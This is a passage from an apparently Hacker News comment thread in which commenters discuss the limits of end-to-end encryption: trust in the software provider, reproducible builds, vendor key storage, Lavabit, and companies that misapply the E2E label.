You're absolutely right that a lot of E2EE is fundamentally a "circle of protection against law", but that doesn't mean it isn't useful. The protection varies a lot depending on which law (jurisdiction) the threat has, after all.

Against a government entity, communications providers (telcos) can be considered already compromised, and represent approximately zero marginal resistance.

Even reproducible builds and audits only raise the bar, they can't solve the problem completely. I'm sure other comments are bringing up reflections on trusting trust, and the underhanded crypto contest has run a few times (I was a finalist).

I suppose my point is that security in real-world systems is never absolute, and always involves trade offs. Our goal should be to have better trade offs.

ryan-c 782 days ago [-]
What if certificate transparency but for app distributed via app stores?
littlestymaar 775 days ago [-]
> Well, actually, just one - the endpoint software could just be changed

That's exactly what makes your entire argument silly: when you use a piece of software, you're trusting this piece of software, and there's no way around this, being web-based doesn't change a damn thing compared to any other software with automatic update.

raincom 782 days ago [-]
I would like to see what Chinese intelligence say about Signal and WhatsApp. What applications they recommend to use? Better use the apps Chinese intelligence recommend for their employees in the West and vice versa. Use NSA's recommended apps in China, Russia and other places.

Remember Crypto AG in Switzerland, owned by CIA. Chinese and Russians never bought Crypto AG secure phone systems.

EGreg 782 days ago [-]
Can’t this argument be made for nearly all implementations of cryptography?

I trust Metamask and 1Password and Meta with their claims of not sending my secret keys to their servers. Just take their word for it!

I trust Apple with their claims about the “secure enclave”

I trust Google with their claims about Chrome not “phoning home” all my keys

I trust Intel with their SGX extensions (and Signal does also)

I trust AWS with their KMS (“key management service”) and so does Magic crypto wallet etc. and even “the experts” like tptacek tell is “just use AWS”

If we ran the national elections electronically, then in theory, Google or Apple could defraud millions of voters into recording incorrect votes and help steal the election.

Our hardware is made by only a few companies. They could have put all kinds of backdoors.

I am not going to go so far as to say the NSA promoted weakened EC2 crypto curves, but I guess it’s possible

But in general, everyone has a Trusted Computing Base:

https://en.m.wikipedia.org/wiki/Trusted_computing_base

Which is why I don’t want to rely on individual devices for security. I prefer a blockchain and having multiple devices secure data.

trashburger 782 days ago [-]
I enjoyed the dialogue posted at the bottom, and made an Ace Attorney version of it (with very minor artistic liberties taken): https://objection.lol/objection/5277436
upofadown 782 days ago [-]
Wasn't Lavabit about SSL keys? Did Lavabit even make any claims about E2EE?
foreigner 782 days ago [-]
Could this issue not be solved by a third party browser plugin to do the crypto?
jcq3 782 days ago [-]
How about delegating to a third party to solve centralization issue?
mediumsmart 781 days ago [-]
I remember Lavabit. I think he gave them a fine Print-out of the keys they requested before shutting down.
ExoticPearTree 782 days ago [-]
Most of the E2E claims are based on technicalities: like when you upload a file via HTTPS it is encrypted and then when you download it later via HTTPS, the transfer itself is encrypted. Therefore, E2E encryption.

In a previous life, the killer app for E2E was "encrypted email" where a lot of companies would claim they do email encryption by having outside recipients visit a website for which the recipient would get a password by SMS in order to read the email sent. And because the website was hosted by the sender on HTTPS... voila, encrypted email. And the sales people from this companies all kept a straight face when explaining how secure the encryption was.

MattPalmer1086 782 days ago [-]
That is not E2E encryption, that is Point to Point (P2P) encryption.

To be E2E, the file should only be decryptable by the sender and receiver. The point in the middle should not be able to see it's plaintext or decrypt its ciphertext.

Culonavirus 782 days ago [-]
It's also what the article omits... Yes, "the authority" that made the E2E software can screw you over, sure, but that's where it ends. There are good reasons for E2E encryption beyond doing shady shit or messing with goverments. E2E solves an entire class of server-side security and personnel issues. Some moderator type of person browsing your nudes? Not possible. Hackers stealing data from the server? You don't care, they can't decrypt it.
MattPalmer1086 782 days ago [-]
I completely agree. It's completely valid to say that E2E cannot protect you from the provider of the cryptographic software. It also fails if the end points themselves are compromised.

There is still tremendous value in being protected from absolutely everyone else.

ExoticPearTree 782 days ago [-]
This is how they sold it: E2E. Could not reason with those people.

What I am saying is that people tend to slap the E2E label on pretty much anything without understanding what it really means.

782 days ago [-]